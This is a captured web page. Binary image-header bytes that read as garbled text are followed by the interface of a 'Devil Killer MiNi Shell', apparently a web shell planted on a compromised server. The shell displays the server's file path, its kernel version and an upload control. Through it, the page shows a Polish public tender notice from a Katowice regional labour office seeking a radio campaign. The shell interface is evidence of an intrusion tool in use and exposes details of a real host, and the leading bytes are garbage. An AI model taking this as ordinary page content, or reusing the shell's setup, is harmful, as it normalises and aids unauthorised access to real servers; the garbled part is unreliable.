JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20201006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20201006/592893-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 592893-N-2020 z dnia 2020-10-06 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Wojewódzki Urząd Pracy</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Usługa przygotowania i realizacji kampanii radiowej promującej działania Wojewódzkiego Urzędu Pracy w Katowicach w ramach Programu Operacyjnego Wiedza Edukacja Rozwój (PO WER) oraz Regionalnego Programu Operacyjnego Województwa Śląskiego (RPO WSL).</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Program Operacyjny Wiedza Edukacja Rozwój 2014-2020 i Regionalny Program Operacyjny Województwa Śląskiego na lata 2014-2020</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Wojewódzki Urząd Pracy</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27685569600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Kościuszki</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">30</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">40-048</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Katowice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">0 32 757 33 61, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">wup@wup-katowice.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">-</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://wup.katowice.ibip.pl/public/?id=196633</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Jednostka organizacyjna samorządu województwa nieposiadająca osobowości prawnej.</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://wup.katowice.ibip.pl/public/?id=196633</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://wup.katowice.ibip.pl/public/?id=196633</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Wojewódzki Urząd Pracy w Katowicach, ul. Kościuszki 30, 40-048 Katowice</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Usługa przygotowania i realizacji kampanii radiowej promującej działania Wojewódzkiego Urzędu Pracy w Katowicach w ramach Programu Operacyjnego Wiedza Edukacja Rozwój (PO WER) oraz Regionalnego Programu Operacyjnego Województwa Śląskiego (RPO WSL).</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">PN/11/20</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Kampania spotowa PO WERPrzedmiot zamówienia obejmuje przygotowanie i realizację kampanii radiowej promującej działania Wojewódzkiego Urzędu Pracy w Katowicach w ramach Programu Operacyjnego Wiedza Edukacja Rozwój na lata 2014 – 2020 (PO WER 2014 - 2020) obejmującej 600-krotną emisję 2 spotów o długości max. 30 sek. każdy.I.	Cel zamówienia: Promocja możliwości i/lub efektów wsparcia w ramach PO WER 2014- 2020 oraz zachęta do skorzystania z projektów finansowanych z EFS.II.	Zasięg kampanii: województwo śląskie.III.	Grupa docelowa kampanii: mieszkańcy woj. śląskiego, osoby w wieku 18-29 lat.IV.	Zakres usługi:1.	Opracowanie mediaplanu.2.	600-krotna emisja spotów w maksymalnie 6 stacjach radiowych. Zakłada się równomierną emisję każdego z 2 rodzajów spotów, tj. po 300 emisji.3.	Wydanie przez Wykonawcę oświadczenia o emisji spotów zgodnie z zaakceptowanym mediaplanem podpisanego przez osobę/osoby upoważnione oraz przekazanie metryczek spotów radiowych.V.	Szczegółowe założenia dotyczące emisji spotów:1. Usługa obejmuje łącznie 600 emisji 2 spotów promujących wsparcie dla osób młodych na rynku pracy w ramach PO WER w maksymalnie 6 lokalnych lub regionalnych stacjach radiowych nadających w woj. śląskim, których zasięg dzienny zgodnie z badaniem Radio Track, realizowanym na zlecenie Komitetu Badań Radiowych, za okres: październik 2019 - marzec 2020 w grupie docelowej osób w wieku 18-29 lat wynosi co najmniej:a) dla regionu katowickiego: minimum 6,8% - 150 emisji,b) dla regionu częstochowskiego: minimum 5,7% - 150 emisji,c) dla regionu bielskiego: minimum 3,1% - 150 emisji,d) dla Okręgu Rybnickiego: minimum 5,2% - 150 emisji2. Proponowane stacje radiowe będą weryfikowane na podstawie raportu z badań słuchalności radiowej Radio Track, który stanowi załącznik do SIWZ. Stacje radiowe należy wybrać spośród tych, które spełniają minimalny wskaźnik słuchalności radiowej wskazany w niniejszym opisie przedmiotu zamówienia. 3. Z każdego regionu należy wybrać co najmniej jedną, maksymalnie dwie stacje (łącznie nie więcej niż 6 stacji), które spełniają wymóg minimalnego wskaźnika słuchalności radiowej, przedstawionego w niniejszym opisie przedmiotu zamówienia. Stacje radiowe proponowane dla poszczególnych regionów mogą się powtarzać pod warunkiem spełnienia warunku minimalnej słuchalności radiowej. Zakłada się równomierny rozkład liczby emisji w każdym regionie, dlatego jeśli w wybranym regionie emisja nastąpi w 2 stacjach radiowych, to w każdej z tych stacji należy założyć emisję w wysokości 75 emisji (łącznie 150 emisji w każdym regionie tj. po 75 w każdej z dwóch stacji).4. W jednym bloku reklamowym spot może zostać wyemitowany tylko raz. Emisje w dni powszednie oraz weekendy w godzinach 6.00 - 22.00, w tym 300 emisjiw godzinach premium tj. od 7.00 do 18.00 w dni powszednie oraz od 9.00 do 16.00w weekendy. Minimum 60 emisji spotów dziennie we wszystkich stacjach radiowych łącznie w ramach całej kampanii, równomierne rozłożenie emisji w całym tygodniu.VI.	Termin realizacji usługi: od podpisania umowy maksymalnie do 18 grudnia 2020 r. Przewiduje się emisję spotów w okresie od zaakceptowania mediaplanu przez Zamawiającego do 18 grudnia br. Wykonawca dostarczy oświadczenie o emisji spotów zgodnie z zaakceptowanym mediaplanem podpisanym przez osobę/osoby upoważnione.VII.	Szczegółowe założenia dotyczące współpracy podczas realizacji usługi:1.	Komunikacja w trakcie realizacji umowy pomiędzy Wykonawcą a Zamawiającym będzie się odbywała drogą mailową (przekazywanie materiałów takich jak np. media plan oraz jego akceptacja).2.	Spoty zostaną wyemitowane na podstawie zaakceptowanego przez Zamawiającego mediaplanu. Wykonawca w terminie do 2 dni roboczych od dnia podpisania umowy przekaże Zamawiającemu do akceptacji mediaplan w ramach kampanii. 3.	Zamawiający akceptuje mediaplan lub nanosi uwagi w terminie do 1 dnia roboczego od przekazania materiału. Wykonawca wprowadza ewentualne uwagi w terminie do 1 dnia roboczego od ich otrzymania od Zamawiającego.4.	Zamawiający przekaże Wykonawcy nagrania spotów na potrzeby emisji w dniu podpisania umowy.5.	Zapłata nastąpi na podstawie faktury w terminie 30 dni od daty jej dostarczenia do siedziby Zamawiającego. Warunkiem zapłaty za usługę jest dostarczenie przez Wykonawcę oświadczenia, że wszystkie nagrania zostały wyemitowane zgodnie z zaakceptowanym mediaplanem (wymagany jest podpis uprawnionego przedstawiciela Wykonawcy oraz pieczątka).6.	Wykonawca zapewni ze swojej strony Koordynatora - osobę odpowiedzialną za całość współpracy i kontakty z Zamawiającym podczas realizacji usługi.VIII.	Licencja:Zamawiający oświadcza, że na zasadzie wyłączności posiada roczną licencję na wyprodukowane spoty na następujące pola eksploatacji: radio, Internet, utrwalenie na nośnikach elektronicznych wykorzystywanych w dystrybucji bezpośredniej (m.in. płyty CD/DVD, pamięć USB).Wykonawca, który zlecać będzie wykonanie części zamówienia (np. opracowanie kluczy kodowych) Podwykonawcom na podstawie umowy w formie pisemnej o charakterze odpłatnym (art. 2 ust. 9a Pzp) zobowiązany jest do wykazania tego w pkt 12 Formularza ofertowego stanowiącego załącznik do niniejszej SIWZ dotyczącego Podwykonawcy.CZĘŚĆ IISZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIAKampania spotowa RPO WSLPrzedmiot zamówienia obejmuje realizację kampanii radiowej promującej działania Wojewódzkiego Urzędu Pracy w Katowicach w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020 (RPO WSL 2014 - 2020), obejmującej 900-krotną emisję 5 spotów o długości max. 30 sek. Każdy.I.	Cel zamówienia: Promocja możliwości i/lub efektów wsparcia w ramach RPO WSL 2014- 2020 oraz zachęta do skorzystania z projektów finansowanych z EFS.II.	Zasięg kampanii: województwo śląskie.III.	Grupy docelowe kampanii: 1. Mieszkańcy woj. śląskiego, osoby w wieku 25-65 lat,2. Mieszkańcy woj. śląskiego: właściciele firm, dyrektorzy, wolne zawody oraz pracownicy umysłowi.IV.	Zakres usługi:1.	Opracowanie mediaplanu.2.	Emisja 5 spotów radiowych dotyczących możliwości wsparcia w ramach RPO WSL:a) 1 spot promujący możliwości i/lub efekty wsparcia dla przedsiębiorstw - dofinansowanie do usług szkoleniowych i doradczych dla firm sektora MŚP i ich pracowników oraz b) 4 spoty promujące możliwości i/lub efekty wsparcia osób pracujących i poszukujących pracy w ramach RPO WSL.3.	Łącznie 900-krotna emisja 5 spotów radiowych. Zakłada się równomierną emisję każdego z 5 rodzajów spotów, tj. po 180 emisji.4.	Wydanie przez Wykonawcę oświadczenia o emisji spotów zgodnie z zaakceptowanym mediaplanem, podpisanego przez osobę/osoby upoważnione.V.	Szczegółowe założenia dotyczące emisji spotów:1. Usługa obejmuje łącznie 900 emisji 5 spotów radiowych, w tym:a) 180 emisji 1 spotu promującego możliwości i/lub efekty wsparcia dla przedsiębiorstw (wymienionego w poz. IV, pkt 1 lit. a)) w maksymalnie 6 regionalnych lub lokalnych stacjach radiowych nadających w woj. śląskim, których zasięg dzienny zgodnie z badaniem Radio Track, realizowanym na zlecenie Komitetu Badań Radiowych, za okres: październik 2019 - marzec 2020 w grupie docelowej: właściciele firm, dyrektorzy, wolne zawody oraz pracownicy umysłowi wynosi co najmniej:1) dla regionu obejmującego byłe woj. katowickie: minimum 5,9% - 45 emisji,2) dla regionu obejmującego byłe woj. częstochowskie: minimum 7,3 % - 45 emisji,3) dla regionu obejmującego byłe woj. bielskie: minimum 4,8% - 45 emisji,4) dla Okręgu Rybnickiego: minimum 3,9 % - 45 emisjib) 720 emisji 4 spotów (wymienionych w poz. IV, pkt 1, lit. b)) promujących wsparcie w ramach RPO WSL w maksymalnie 6 lokalnych lub regionalnych stacjach radiowych nadających w woj. śląskim, których zasięg dzienny zgodnie z badaniem Radio Track, realizowanym na zlecenie Komitetu Badań Radiowych, za okres: październik 2019 - marzec 2020 w grupie docelowej: osoby w wieku 25-65 lat, wynosi co najmniej:1) dla regionu obejmującego byłe woj. katowickie: minimum 5,9% - 180 emisji,2) dla regionu obejmującego byłe woj. częstochowskie: minimum 5,1% - 180 emisji,3) dla regionu obejmującego byłe woj. bielskie: minimum 3,1% - 180 emisji,4) dla Okręgu Rybnickiego: minimum 3,5 %- 180 emisji2. W jednym bloku reklamowym spot może zostać wyemitowany tylko raz. Emisje w dni powszednie oraz weekendy w godzinach 6.00 - 22.00, w tym minimum 450 emisji w godzinach premium tj. od 7.00 do 18.00 w dni powszednie oraz od 9.00 do 16.00 w weekendy. Minimum 90 emisji spotów dziennie łącznie we wszystkich stacjach radiowych w ramach kampanii, równomierne rozłożenie emisji w całym tygodniu. 3. Proponowane stacje radiowe będą weryfikowane na podstawie raportu z badań słuchalności radiowej Radio Track, który stanowi załącznik do SIWZ. Stacje radiowe należy wybrać spośród tych, które spełniają minimalny wskaźnik słuchalności radiowej wskazany w niniejszym opisie przedmiotu zamówienia. 4. Z każdego regionu należy wybrać co najmniej jedną, maksymalnie dwie stacje (łącznie nie więcej niż 6 stacji) , które spełniają wymóg minimalnego wskaźnika słuchalności radiowej, przedstawionego w niniejszym opisie przedmiotu zamówienia. Stacje radiowe proponowane dla poszczególnych regionów mogą się powtarzać pod warunkiem spełnienia warunku minimalnej słuchalności radiowej (jeśli stacja x spełnia wymóg progu słuchalności np. w regionie bielskim i katowickim, to można ją wybrać w tych dwóch regionach).5. Zakłada się równomierny rozkład liczby emisji w każdym regionie, dlatego jeśli w wybranym regionie emisja nastąpi w 2 stacjach radiowych, to w każdej z tych stacji należy założyć emisję w wysokości 90 emisji (łącznie 180 emisji w każdym regionie tj. po 90 w każdej z dwóch stacji dla danego regionu). VI.	Termin realizacji usługi: od podpisania umowy do 18 grudnia 2020 r. Przewiduje się emisję spotów w okresie od zaakceptowania mediaplanu przez Zamawiającego do 18 grudnia 2020 r. Wykonawca dostarczy oświadczenie o emisji spotów zgodnie z zaakceptowanym mediaplanem podpisanym przez osobę/osoby upoważnione najpóźniej do 18 grudnia 2020 r.VII.	Szczegółowe założenia dotyczące współpracy podczas realizacji usługi:1.	Komunikacja w trakcie realizacji umowy pomiędzy Wykonawcą a Zamawiającym będzie się odbywała drogą mailową (przekazywanie materiałów takich jak np. media plan oraz jego akceptacja).2.	Spoty zostaną wyemitowane na podstawie zaakceptowanego przez Zamawiającego mediaplanu. Wykonawca w terminie do 2 dni roboczych od dnia podpisania umowy przekaże Zamawiającemu do akceptacji mediaplan w ramach kampanii. 3.	Zamawiający akceptuje mediaplan lub nanosi uwagi w terminie do 1 dnia roboczego od przekazania materiału. Wykonawca wprowadza ewentualne uwagi w terminie do 1 dnia roboczego od ich otrzymania od Zamawiającego.4.	Zamawiający przekaże Wykonawcy nagrania spotów na potrzeby emisji w dniu podpisania umowy.5.	Zapłata nastąpi na podstawie faktury w terminie 30 dni od daty jej dostarczenia do siedziby Zamawiającego. Warunkiem zapłaty za usługę jest dostarczenie przez Wykonawcę oświadczenia, że wszystkie nagrania zostały wyemitowane zgodnie z zaakceptowanym mediaplanem (wymagany jest podpis uprawnionego przedstawiciela Wykonawcy oraz pieczątka).6.	Wykonawca zapewni ze swojej strony Koordynatora - osobę odpowiedzialną za całość współpracy i kontakty z Zamawiającym podczas realizacji usługi.VIII.	Licencja:Zamawiający oświadcza, że na zasadzie wyłączności posiada roczną licencję na wyprodukowane spoty na następujące pola eksploatacji: radio, Internet, 